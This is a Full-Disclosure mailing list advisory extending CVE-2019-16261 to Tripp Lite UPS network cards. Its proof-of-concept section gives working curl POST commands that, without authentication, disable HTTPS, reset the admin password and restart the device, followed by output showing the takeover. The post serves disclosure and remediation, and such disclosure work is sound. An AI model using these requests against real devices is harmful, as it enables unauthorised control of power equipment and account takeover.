lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CAMSOKUTwcR6Nwv_XSjyySs2+gdk=jw5hmd-rPDU8oV4eD4gDpw@mail.gmail.com>
Date: Mon, 17 Mar 2025 10:37:52 -0400
From: Lucas Lalumière <lucas.lalum@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] CVE-2019-16261 (UPDATE): Unauthenticated POST requests to
 Tripp Lite UPS Systems

[Author]: Lucas Lalumiere
[Contact]: lucas.lalum@...il.com
[Date]: 2025-3-17
[Vendor]: Tripp Lite
[Product]: SU750XL UPS
[Firmware]: 12.04.0052
[CVE Reference]: CVE-2019-16261

============================
Affected Products (Tested):
============================
- Tripp Lite PDU's (e.g., PDUMH15AT)
- Tripp Lite UPS's (e.g., SU750XL)   *NEW*

======================
Vulnerability Summary:
======================
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite
PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send
POST requests to the `/Forms/` directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services

Through my own experimentation, I have discovered that this vulnerability
is also effective on Tripp Lite UPS systems, including my Tripp Lite
SU750XL, and applies to firmware 12.04.0052. This suggests the issue
extends beyond just PDUs, as mentionned in the CVE, to the network cards
equipped in Tripp Lite PDU's and UPS's (like my SNMPWEBCARD55) with
vulnerable firmware versions 12.04.0053 and below.

=========================
Proof of Concept (PoC):
=========================
These curl commands, similar to those provided originally by Jim Becher's
blog, are among those I've tested on the SU750XL.

1. Turning off Services (like HTTPS):
```
curl -X POST -d
"netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/network_web_1

curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```

Result (PowerAlert terminal):
```
    System settings were changed.
    Initiating system shutdown procedure ... complete.
    The system is restarting now.

    ...

    SERVICES:
    HTTP    is enabled  on port 80
    HTTPS   is disabled on port 443
    SSH     is enabled  on port 22
    TELNET  is enabled  on port 23
    FTP     is enabled  on port 21
    SYSLOG  is enabled
```

2. Change Admin Password
```
curl -X POST -d
"securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes"
http://[DEVICE_IP]/Forms/system_security_1

curl -X POST -d "startreset=Restart+PowerAlert" http://
[DEVICE_IP]/Forms/requestreset_1
```

Result (PowerAlert terminal):
```
    System settings were changed.
    Initiating system shutdown procedure ... complete.
    The system is restarting now.

    ...

    Login: newadmin
    Password: *****
    Logged in as user newadmin
    $ _
```

=======
Impact:
=======
- High Availability Impact: Attackers can remotely control power functions,
affecting critical systems connected to PDU/UPS'.
- High Confidentiality Impact: Attackers can obtain admin access to any of
the device's information via changing credentials.
- High Integrity Impact: Attackers, if not through the POST requests, can
modify any configuration by using modified admin credentials.

===============
Exploit Status:
===============
This vulnerability has already been patched in newer network card firmware
versions and acknowledged by Eaton. It was previously reported in
CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDU's.

=======================
Recommended Mitigation:
=======================
Upgrade webcard firmware to the newest version. You can find the download
here:
 - https://tripplite.eaton.com/support/downloads?type=software&subtype=32

===========
References:
===========
- Original discovery:
https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261

====================
Discoverer/Credits:
====================
 - Jim Becher, 2019-08-19

This disclosure is being submitted to expand upon the original CVE report,
adding additional affected products and detail. My find confirms that both
Tripp Lite UPS and PDU devices equipped with optional network cards (e,g.
SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ